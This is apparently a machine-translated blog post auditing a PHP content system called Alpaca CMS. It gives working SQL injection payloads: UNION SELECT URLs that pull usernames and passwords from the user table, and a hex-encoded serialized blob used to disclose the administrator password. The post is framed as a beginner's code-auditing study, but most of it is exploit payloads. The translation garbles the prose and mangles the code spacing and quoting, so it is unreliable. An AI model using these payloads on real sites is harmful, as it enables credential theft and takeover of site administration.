Alpaca CMS SQL injection & amp; getShell

Recently I am studying code auditing, so I went to chinaz to find a personal cms, which is very popular. This article is suitable for people I just got started.

Ue checked the source code in batches. The whole system is injecting the injection.

Yes, single quotes, still need to bypass, open gpc will be miserable, however, found this great cms, actually automatically remove gpc...

 

// Remove Magic_Quotes if (get_magic_quotes_gpc () // Maybe wocould be removed in php6 {function stripslashes_deep ($ value) {$ value = is_array ($ value )? Array_map ('stripslashes _ deep ', $ value): (isset ($ value )? Stripslashes ($ value): null); return $ value ;}$ _ POST = stripslashes_deep ($ _ POST); $ _ GET = stripslashes_deep ($ _ GET ); $ _ COOKIE = stripslashes_deep ($ _ COOKIE );}

 

Start injection at the front end

Http: // 127.0.0.1/coder/alpaca/index. php/page/18/

The corresponding SQL statement is

select count(*) as a from `elem` where 1 and rel_id=’18′

When we submit
 

http://127.0.0.1/coder/alpaca/index.php/page/a’

SQL statement

select * from `elem` where 1 and lower(elem_name) = lower(‘a”)

Here is a classic joint query. I was still thinking about how to bypass gpc. I didn't expect to automatically remove the bird.

Submit directly
 

http://127.0.0.1/coder/alpaca/index.php/page/a’) AND 1 =2 UNION SELECT 1 ,2,3, 4,5,6, 7, 8, 9,username,PASSWORD FROM user %23

I found everything.

Look at the source code app \ v \ elem \ page. php. In fact, many of the source code is well written.

 

if(!is_array($page)) show_404();     $pid = $page['id'];      if( $action == 'add' ) {       $this->add($pid);       return;     }      $info = unserialize($page['elem_info']);     $meta = array(       'page_title' => isset($info['page_title'])&&$info['page_title']!=''?$info['page_title']:$page['title'],       'meta_keywords' => isset($info['meta_keywords'])&&$info['meta_keywords']!=''?$info['meta_keywords']:$page['title'],       'meta_description' => isset($info['meta_description'])&&$info['meta_description']!=''?$info['meta_description']:$page['title']     );   $param = array_merge($page , $info , $meta  );

 

One$ Page ['elem _ info']Then I will write an official elem_info (hexadecimal) on December 6)

Get exp

 

http://127.0.0.1/coder/alpaca/index.php/page/a') AND 1 =2 UNION SELECT 18,PASSWORD ,'page',10,1,0x613A31353A7B733A353A226D6F64656C223B733A313A2238223B733A333A22706963223B733A37303A22687474703A2F2F79752E6232342F616C70616361332E312F757066696C652F696D6167652F32303132303432312F32303132303432313030303135315F34363936352E6A7067223B733A353A227072696365223B733A333A22333030223B733A373A22636F6E74656E74223B733A303A22223B733A31303A22706167655F7469746C65223B733A303A22223B733A31333A226D6574615F6B6579776F726473223B733A303A22223B733A31363A226D6574615F6465736372697074696F6E223B733A303A22223B733A383A2274656D706C617465223B733A313A2230223B733A363A226C61796F7574223B733A313A2239223B733A393A22706167655F73697A65223B733A323A223230223B733A31343A226368696C645F74656D706C617465223B733A313A2230223B733A31323A226368696C645F6C61796F7574223B733A313A2232223B733A31313A226368696C645F6D6F64656C223B733A313A2231223B733A31313A22757365725F62726F777365223B733A313A2230223B733A383A22757365725F616464223B733A323A223130223B7D, 7, "1334937721","1334937721", 10,11 FROM user %23/

 

The administrator password is successfully disclosed.